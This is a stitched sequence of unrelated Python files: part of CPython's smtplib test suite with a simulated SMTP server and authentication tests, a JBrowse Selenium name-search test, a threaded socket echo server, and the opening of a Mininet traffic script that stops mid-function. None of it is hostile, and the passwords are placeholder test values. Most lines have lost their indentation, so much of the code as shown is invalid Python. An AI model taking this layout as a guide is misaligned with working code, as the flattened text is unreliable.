m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs=
'foo@example.net')
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: joe@example.com$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
            to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile("^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: the_rescuers@Rescue-Aid-Society.com$',
re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
            to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
        m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
del m['Bcc']
del m['Resent-Bcc']
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: holy@grail.net$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
            to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
        m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, 'test msg'
)
def testNonnumericPort(self):
self.assertRaises(OSError, smtplib.SMTP, 'localhost', 'bogus')
self.assertRaises(OSError, smtplib.SMTP, 'localhost:bogus')
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b'199 no hello for you!')
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP, HOST,
self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + b'.' * smtplib._MAXLINE * 2 + b'\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = self.evt, self.respdata, self.sock
threading.Thread(target=server, args=servargs).start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP, HOST,
self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com': 'John A', 'Ms.B@xn--fo-fka.com':
'Sally B', 'Mrs.C@somewhereesle.com': 'Ruth C'}
sim_auth = 'Mr.A@somewhere.com', 'somepassword'
sim_cram_md5_challenge = (
'PENCeUxFREJoU0NnbmhNWitOMjNGNndAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1': ['Mr.A@somewhere.com', 'Mrs.C@somewhereesle.com'],
'list-2': ['Ms.B@xn--fo-fka.com']}
class ResponseException(Exception):
pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(['250-{0}\r\n'.format(x) for x in
extra_features])
super(SimSMTPChannel, self).__init__(*args, **kw)
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push('503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push(
'504 Command parameter not implemented: unsupported authentication mechanism {!r}'
.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\x00')
except ValueError as e:
self.push(
'535 Splitting response {!r} into user and password failed: {}'
.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push(
                    '535 Splitting response {!r} into user and password failed: {}'
.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(sim_auth[1].encode('ascii'), self
._decode_base64(sim_cram_md5_challenge).encode('ascii'), 'md5'
).hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
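    # For context (a sketch of the client side, mirroring smtplib rather than
    # code from this test): SMTP.auth_cram_md5 answers the challenge with
    #   user + " " + hmac.HMAC(password.encode('ascii'),
    #                          <base64-decoded challenge>, 'md5').hexdigest()
    # and that reply reaches this method base64-encoded in 'arg'.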
def smtp_EHLO(self, arg):
resp = (
'250-testhost\r\n250-EXPN\r\n250-SIZE 20000000\r\n250-STARTTLS\r\n250-DELIVERBY\r\n'
)
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email],
quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email],
quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count - 1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(self._extra_features, self,
conn, addr, decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
self.assertEqual(smtp.esmtp_features, {})
expected_features = {'expn': '', 'size': '20000000', 'starttls': '',
'deliverby': '', 'help': ''}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
for addr_spec, name in sim_users.items():
expected_known = 250, bytes('%s %s' % (name, smtplib.quoteaddr(
addr_spec)), 'ascii')
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = 550, ('No such user: %s' % u).encode('ascii')
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = 250, bytes('\n'.join(users), 'ascii')
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = 550, b'No access for you!'
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature('AUTH LOGIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature('AUTH CRAM-MD5')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
self.serv.add_feature('AUTH BOGUS PLAIN LOGIN CRAM-MD5')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature('AUTH {}'.format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port, local_hostname=
'localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(smtplib.SMTPNotSupportedError, smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(smtplib.SMTPNotSupportedError, smtp.mail, 'John',
options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', ''
)
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(self._extra_features, self,
conn, addr, decode_data=self._decode_data, enable_SMTPUTF8=self
.enable_SMTPUTF8)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=
None, rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False, enable_SMTPUTF8=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m, mail_options=['BODY=8BITMIME',
'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(smtp.mail('Jő', options=['BODY=8BITMIME',
'SMTPUTF8']), (250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = 'Páolo <főo@bar.com>'
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink ὠ9'
msg.set_content('oh là là, know what I mean, know what I mean?\n\n')
expected = textwrap.dedent(
""" From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink ὠ9
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
"""
)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
msg = EmailMessage()
msg['From'] = 'Páolo <főo@bar.com>'
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink ὠ9'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
        self.assertRaises(smtplib.SMTPNotSupportedError, smtp.send_message, msg)
EXPECTED_RESPONSE = encode_base64(b'\x00psu\x00doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.serv = SimSMTPAUTHInitialResponseServer((HOST, 0), ('nowhere',
-1), decode_data=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(BadHELOServerTests, DebuggingServerTests,
GeneralTests, NonConnectingTests, SMTPAUTHInitialResponseSimTests,
SMTPSimTests, TooLongLineTests)
if __name__ == '__main__':
test_main()
|
volvox_REST_names_test.py
|
import threading
import unittest
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
import name_server
from jbrowse_selenium import JBrowseTest
class VolvoxRestTest( JBrowseTest ):
data_dir = 'tests/data/names_REST&tracks=Genes,CDS'
def setUp( self ):
# Does not bother formatting, assumes it's been done through ./setup
# The volvox_biodb_test.py test can be used to test formatting
t = threading.Thread(target=name_server.start_server, name='Backend')
t.daemon = True
t.start()
super( VolvoxRestTest, self ).setUp()
def test_volvox( self ):
# select "ctgA from the dropdown
self.select_refseq( 'ctgA' )
# check a good browser title
assert "ctgA" in self.browser.title, "browser title is actually %s" % self.browser.title
self.assert_no_js_errors()
# test scrolling, make sure we get no js errors
self.scroll()
# test sequence track display
self.scroll_around()
# test autocompletion
self.autocomplete()
self.assert_no_js_errors()
def scroll_around( self ):
self.do_typed_query( '0..80' )
self.do_typed_query( '1..20000')
self.do_typed_query( 'ctgA:19961..20047')
def autocomplete( self ):
self._do_typed_query_and_wait("App", 2)
self._do_typed_query_and_wait("EDE", 1)
loc = self.browser.title
self.browser.find_element_by_id("location").send_keys( Keys.RETURN )
self.waits_for_scroll(loc)
self._do_typed_query_and_wait("Apple1", 1)
loc = self.browser.title
self.browser.find_element_by_id("location").send_keys( Keys.RETURN )
self.waits_for_scroll(loc)
# Do a search and wait for a specific number of results
def _do_typed_query_and_wait( self, text, num_of_results ):
qbox = self.browser.find_element_by_id("location")
qbox.clear()
qbox.send_keys( text )
WebDriverWait(self, 5).until(lambda self: self.is_right_num_of_entries (num_of_results))
# Compares number of returned results against expected results
def is_right_num_of_entries( self, num ):
return len(self.browser.find_elements_by_css_selector("#location_popup>*"))-2 == num
class VolvoxBiodbTest( VolvoxRestTest, unittest.TestCase ):
pass
if __name__ == '__main__':
import unittest
unittest.main()
|
network.py
|
import socket
import threading
class Receiver:
def __init__(self, options, summary):
self.options = options
self.summary = summary
self.runable = True
self.socket = socket.socket(socket.AF_INET, options.protocol)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.socket.bind(("", options.port))
def listen(self):
self.socket.listen(3)
while self.runable:
client, address = self.socket.accept()
client.settimeout(60)
threading.Thread(
target = self.receive, args = (client,address)
).start()
self.socket.close()
def receive(self, client, address):
size = 1024
while True:
try:
                data = client.recv(size)
                if data:
                    client.send(b"ACK")
                else:
                    raise socket.error('Client disconnected')
            except socket.error:
                client.close()
                return False
class Sender:
def __init__(self, options, summary):
self.options = options
self.summary = summary
self.runable = True
# some example code found on the web -------------------------------------------
class ThreadedServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(
target = self.listenToClient, args = (client,address)
).start()
def listenToClient(self, client, address):
size = 1024
while True:
try:
                data = client.recv(size)
                if data:
                    # Set the response to echo back the received data
                    response = data
                    client.send(response)
                else:
                    raise socket.error('Client disconnected')
            except socket.error:
                client.close()
                return False
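# A minimal client sketch for ThreadedServer (an illustrative assumption, not
# part of the original module; the port value is a placeholder). It is defined
# here but never called automatically.
def example_echo_client(host='127.0.0.1', port=5555, payload=b'hello'):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((host, port))
        client.send(payload)
        # The server echoes back whatever bytes it received.
        return client.recv(1024)
    finally:
        client.close()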
if __name__ == "__main__":
while True:
port_num = input("Port? ")
try:
port_num = int(port_num)
break
except ValueError:
pass
ThreadedServer('',port_num).listen()
|
py-mininet.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 7 10:26:46 2019
@author: mep53
"""
from mininet.net import Mininet
from mininet.link import TCLink
from mininet.node import OVSController
from mininet.node import CPULimitedHost, Host, Node
from mininet_rest import MininetRest
from mininet.topo import LinearTopo
from mininet.topo import SingleSwitchTopo
from mininet.topolib import TreeTopo
from functools import partial
from mininet.net import Mininet
from mininet.node import RemoteController
from mininet.node import OVSSwitch
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import logging
import time
import threading
import sys
import subprocess
from datetime import datetime
#LOG = logging.getLogger(os.path.basename(__file__))
#LOG = logging.getLogger(__name__)
setLogLevel('info')
def thread_launch(net):
mininet_rest = MininetRest(net)
mininet_rest.run(host='0.0.0.0', port=9081)
def thread_traffic(net,host_src,host_target_ip, bandw):
time.sleep(20)
info("About to trigger traffic")
# net.hosts[host_src].sendCmd("iperf -u -t 6000 -c " + host_target_ip + " -b 80M")
net.hosts[host_src].sendCmd("iperf -u -t 90 -c " + host_target_ip + " -b " + bandw )
info("Triggered Iperf "+ str(host_src) +" -> "+host_target_ip)
def thread_failure(net):
info("Wait for failure")
#time.sleep(240)
